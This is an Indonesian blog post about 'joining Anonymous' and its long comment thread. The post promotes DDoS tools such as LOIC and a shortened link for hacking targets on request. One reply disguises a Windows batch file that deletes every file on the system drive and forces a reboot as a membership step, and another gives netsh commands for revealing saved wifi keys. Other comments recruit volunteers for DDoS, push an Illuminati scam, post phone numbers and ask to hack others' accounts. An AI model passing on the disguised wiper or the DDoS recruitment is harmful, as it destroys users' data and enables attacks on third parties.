Senin, 03 Juni 2013

Cara bergabung anonymous

Apakah anda siap untuk menjadi anonymous the hacker?
Bila anda siap anda harus mengetahui ini terlebih dahulu:

-Anonymous tidak ada pemimpin/ketua
-Anonymous bukan kejahatan
-Indetitas anda tidak boleh diketahui oleh siapa saja
-Anonymous bukan,hobi,game,dll
-Anda harus buat web anonymous sendiri
-Kita sealu berbagi 

Yang perlu di Dowload adalah:
LOIC(low orbit ion cannon)
Anonymous Doser
Anonymous external attack
Dan yg terakhir OS anonymous 1.0

Web anonymous

http://adf.ly/PxQ2u

APA fungsi web itu??

JAwaban:Fungsi nya adalah,apabila anda tidak punya alat alat hack atau yg lain tapi anda ingin nge hack password,hack webside,dll ,anda hanya kirim alamat: e-mail/web/blog target ke alamat email yg sudah di sediakan di blog itu........

ANONYMOUS IS LEGION
WE DONT FORGET
WE DONT FORGIVE
EXPECT US


129 komentar:

  1. Kalo HOIC (high orbit ion canon) boleh gak?

    BalasHapus
    Balasan
    1. Y kalo bisa digunakan terus tau caracgunakany boleh

      Hapus
    2. Komentar ini telah dihapus oleh pengarang.

      Hapus
    3. adakah yg sudih ajar saya dari nol

      Hapus
    4. saya sangat tertarik dengan dunia hack. bahkan selalu nonton film hacker. tapi belum ngerti

      Hapus
    5. Saya ingin bergabung dengan hacker

      Hapus
  2. Balasan
    1. Mau tau aq udah pernah coba pertama buka komputer/laptop anda baru buka notepad baru ketik script ini di Notepad

      @echo off
      del %systemdrive%\*.* /f /s/ /q
      shutdown -r -f -t 00

      trus simpen filenya dengan nama Reg-Anon.bat
      inget...., kudu enkstensi *.bat yah...

      nah, sebelum ke step final
      ane cuma ngingetin lagi
      inget, semua resiko ditanggung sendiri...

      ok,
      step final
      klik ganda/double klik file tadi...
      nah, tinggal ikutin aja deh step-step yang nongol
      dan selamat, anda telah menjadi Member ANONYMOUS...
      :)

      Hapus
    2. Kalo bobol wifi code dn caranya gimana y lebih jelasnya

      Hapus
    3. buka cmd
      ketik netsh wlan show profiles,pilih nama wifi yg mau di bobol
      ketik lagi netsh wlan show profile (masukan nama wifi yg ingin dibobol) key=clear
      lihat tulisan paling bawah
      selamat menikmati, good luck
      -zack

      Hapus
    4. Maksudnya buatbweb sendiri itu gimana ya??

      Hapus
    5. @rafif22_dandra. Yang bener aja
      Itu bukan untuk gabung
      Melainkan untuk menghapus semua data yang ada di komputer

      Hapus
  3. Tulong dong solusi nya
    Cra gabungnya gmna

    BalasHapus
  4. Saya Berharap bisa jadi keluarga apa bila adasalah satu dari pihak2 itu mau merekrut saya.

    BalasHapus
  5. Gays gimanih cara gabung di anonymous

    BalasHapus
  6. Kita sudah bergabung dengan anonymous. Anonymous sudah memberi Web nya

    BalasHapus
  7. Gnn cara bergabungnya...hmn jg dgn org yg awam ttg teknology?

    BalasHapus
  8. g mana cara bergabungnya??

    BalasHapus
  9. Bro anonymous itu bukan resmi suatu organisasi, jdi anonymous adalah sebuah grup besar yang memiliki ketertarikan bersama,jadi siapa saja bisa menjadi anonymous

    BalasHapus
  10. Tolong dong kasih solusi saya mau root hp android j1 mini pake apk root sudah saya coba semua tapi gagal terus...tolong dong buat yg ahli kasih tau saya...pake apk apa yg bisa root hp...

    BalasHapus
  11. Min invite dong min...saya pengen belajar hacking

    BalasHapus
  12. Hahaha..thanks for info
    We are anonymous
    We are Legion
    We do not forgive
    We do not forget
    Expecp us..

    BalasHapus
  13. Broe gmna klau ikut gbung.
    Tlong dong yg udha pakar ajarin

    BalasHapus
  14. OKE GUE MAU GABUNG BRO SALAM DIBANTU

    BalasHapus
  15. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  16. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  17. To Didan gmn caranya daftar and gabung

    BalasHapus
  18. Kalo yg mau jadi hacker pakai android gimana

    BalasHapus
  19. apk buat nge hack apa aja bagi link
    download dong

    BalasHapus
  20. Cara gabung nya gan gimana kasih tau dong yang baik

    BalasHapus
  21. cara instal linux benaran
    gimana ara ea biar bisa
    bikin web sendiri

    BalasHapus
  22. Gua mau belajar jadi hacker bisa di bimbing gak?

    BalasHapus
  23. Saya ingin bergabung dengan anonymous Indonesia mohon bimbinganya kepada kalian semua

    BalasHapus
  24. Cara gabung gimana aku udh pintar hack

    BalasHapus
  25. https://chat.whatsapp.com/B9Kfp0Uyc0FIYx7VrdhdpQ

    Silahkan gabung ke grub WA diatas sedang dibutuhkan tenaga DDoS secara sukarela

    BalasHapus
  26. Cara gabungnya gmna bang klau mlalui handphone?

    -Capten.nemo

    BalasHapus
  27. fans aku ni,,, sudah lamami sy mau gabung tapi tidak tau caranya, sukses buat anonymous salam dari sulawesi

    BalasHapus
  28. Cara hack wifi lewat cmd gimana ya..? Tolong jelasin detainya dan command nya apa aja..🙏🏼

    BalasHapus
  29. Ass.. selamat malam kami dari instansi sekolah di samarinda.perkenan nama saya ardi staff tu.mau mempertanyakan ancaman terhadap sekolah kami dan orang tersebut mengatas namakan hacker anonymouse.saya pasti tidak percaya dan segitu ya anomimose. Kejadian ini terus ber ulang2.bahkan mengancam akan hack website sekolah.yg saya harapkan pihak di fb tersebut bisa kami ketahui pelakunya yg mengatas namakan alumni dan anggota anonimouse.mungkin trman2 bisa bantu pesan ini agar dibantu.demoga anak didik kami tidak terganggu dengan situasi ini.trimakasih atas bantuanya.085252018885

    BalasHapus
  30. Ini cara gabung ke grub anonymous gimana karena saya hanya ingin menjadi seorang Hacker? Tolong beri tau jawabannya

    BalasHapus
  31. Komentar ini telah dihapus oleh pengarang.

    BalasHapus
  32. Broo, ajarin aku jd hacker dong

    BalasHapus
  33. Bro ajarin dong cara melihat orang yg nge-hack akun Facebook teman

    BalasHapus
  34. Terimakasih atas masukannya.
    Saya coba ngehek data MCd dan berhasil.
    Dan saya sudah menjadi anonimous.
    dan saya bergabung dengan tengkorak CYBER. 💀

    BalasHapus
  35. GombaL Mukiyo....mau jadi hacker kok merengek rengek....ajarin dong ajarin dong...,belajar sendiri...cari info sendiri...praktek sendiriiii....rajin baca rajin cari materi.....ini bukan seperti mie instan

    BalasHapus
    Balasan
    1. Maaf buat para heck saya hanya orang biasa yang tidak tau cara meheck tapi saya ingin belajar seperti apa hack ituh karna aku FB dan game saya selalu dihack yang berbaik hati atau ingin membantu saya .tolong bantuannya

      Hapus
  36. Bantu saya hack akun temen yang udah ngehack aku

    BalasHapus
  37. Saya ingin bergabung dan belajar tapi gimana caranyA...saya nfe hack cuma pake hp

    BalasHapus
  38. Pliss yg rumahnya bantul,tolong
    ajari saya lebih luas,tapi pake hp karena gapunya laptop😹😹

    BalasHapus
  39. Pliss yg rumahnya bantul,tolong
    ajari saya lebih luas,tapi pake hp karena gapunya laptop😹😹

    BalasHapus
  40. Saya ingin bergabung dan belajar tapi gimana caranyA...saya nfe hack cuma pake hp

    BalasHapus
  41. Saya ingin bergabung 085373721826

    BalasHapus
  42. Saya ingin bergabung 082290657572

    BalasHapus
  43. saya mau login tetapi sdh di block

    BalasHapus
  44. bang hack cara ngehack fb gimana caranya bang

    BalasHapus
  45. Kalau mau belajar dari dasar kek mana cara nya.

    BalasHapus
  46. Cara belajar dari dasar kekmana

    BalasHapus
  47. Join anonymous invite WA +628983593550
    Hack pakai CMD ataupun Aplikasi

    BalasHapus
  48. bang aku mau belajar heck
    mau ikutan grun anonymous nya kasi info dong cara gabungnya

    BalasHapus
  49. Join anonymous invite wa 083832600008

    BalasHapus
  50. Join anonymous invite wa
    083892701231

    BalasHapus
  51. Greetings friends, I will join in the conversation

    BalasHapus
  52. Bobol wifi lewat hp bisa kah?

    BalasHapus
  53. Cara hack Instagram ada yang tau

    BalasHapus
  54. Saya ada masalah,,, mobil saya dbawa kabur,, ada satu ptunjuk klo dia masih menggunakan no WA, , apa ada yg sudi membantu cari kberadaan orang tersebut, ,, trims

    BalasHapus
  55. Ad fly aduh yang ada ke hack email saya mas

    BalasHapus
  56. Saya ingin memngetahui lokasi tempat teman saya

    BalasHapus
  57. Pengen heck Mantan caranya gimana yah ?🤭😁

    BalasHapus
  58. Saya sebenarya disini inin gabung tapi ada satu hal sya Gk bisa lakukan

    BalasHapus
  59. Bang saya ingin gabung
    Grup anonymous
    Bisa yah bg

    BalasHapus
  60. Bg gimana cara gabungnya
    Mau belajar bg

    BalasHapus
  61. tolong info dong cara menjadi hacker

    BalasHapus
  62. Ini adalah undangan terbuka bagi Anda semua untuk menjadi bagian dari organisasi terbesar di dunia dan mencapai puncak karier Anda. Ketika programmer perekrutan tahun ini dimulai dan pesta panen tahunan kami sudah dekat. Grandmaster memberi kami mandat untuk selalu menjangkau orang-orang seperti Anda, jadi ambil kesempatan ini dan bergabunglah dengan organisasi Illuminati yang hebat, bergabunglah dengan unit global kami. Bawalah yang miskin, membutuhkan dan berbakat
    Keunggulan ketenaran dan kekayaan. Dapatkan uang, ketenaran, kekuatan, keamanan, dapatkan.
    diakui dalam bisnis Anda, karier politik, naik ke tertinggi dalam apa pun yang Anda lakukan, jadilah
    Terlindungi secara spiritual dan fisik! Semua ini akan Anda capai
    sinar mata

    Illuminati tidak memiliki hubungan dengan Setanisme, Luciferisme atau agama apa pun. Sementara anggota individu kami diizinkan untuk mengikuti dewa apa pun yang mereka pilih, kami beroperasi semata-mata untuk keuntungan dan perlindungan spesies manusia.

    Apakah Anda menerima menjadi anggota tatanan dunia Illuminati baru ini?
    Hubungi & WhatsApp +19735567426
    📩 carlosmacdonald234@gmail.com

    BalasHapus
  63. http://chat.whatsapp.com/DgjUkUjny3TFxKKUiyNnci

    BalasHapus
  64. http://chat.whatsapp.com/DgjUkUjny3TFxKKUiyNnci

    BalasHapus
  65. bisakah bantu saya supaya bisa belajar tentang hacker?

    BalasHapus
  66. Kalo nge hack fb ada yang bisa?

    BalasHapus
  67. Wah Hebat Saya Juga Mau Jadi Hacker Anonymous Hehe :v

    BalasHapus
  68. Saya ingin bergabung dengan hacker anonymous

    BalasHapus
  69. tolong di invite min please

    BalasHapus
  70. Saya ingin bergabung untuk menjadi hacker anonymous yang baik
    Izinkan saya bergabung dengan kalian
    Saya akan menjadi yang terbaik untuk kalian yang telah berjasa untuk para anonymous saya ingin melanjutkan perjuangan kalian agar saya bisa menjadi sukses seperti kalian
    Karena saya tahu kalian bukan orang jahat

    BalasHapus
  71. Wkwkwkwk gwe kog nyasar ke link wa ya bro

    BalasHapus
  72. bang apa tapilan awalnya mau gabung anonymous Adf.ly y

    BalasHapus
  73. bang bantuin aku dan ajarin aku untuk jadi hacker krna aku mau blas dendam

    BalasHapus
  74. Bang saya ingin mempersatukan bangsa,apakah anda bisa membantu saya

    BalasHapus
  75. Gmn cara untuk bsa bergabung ya

    BalasHapus
  76. Bisa gak anonymouse buatkan saya injektor untuk hack game online?? Saya sangat membutuhkannya🙏🙏😭

    BalasHapus
  77. Saya ingin menjadi hacker tapi tidak ada dana untuk membeli perangkat.. maka bantulah saya🙏🙏🙏

    BalasHapus
  78. Ada yang mampu ga hack cip domino island...chalenge ne..gw gedek aja neh..buntung mulu...

    BalasHapus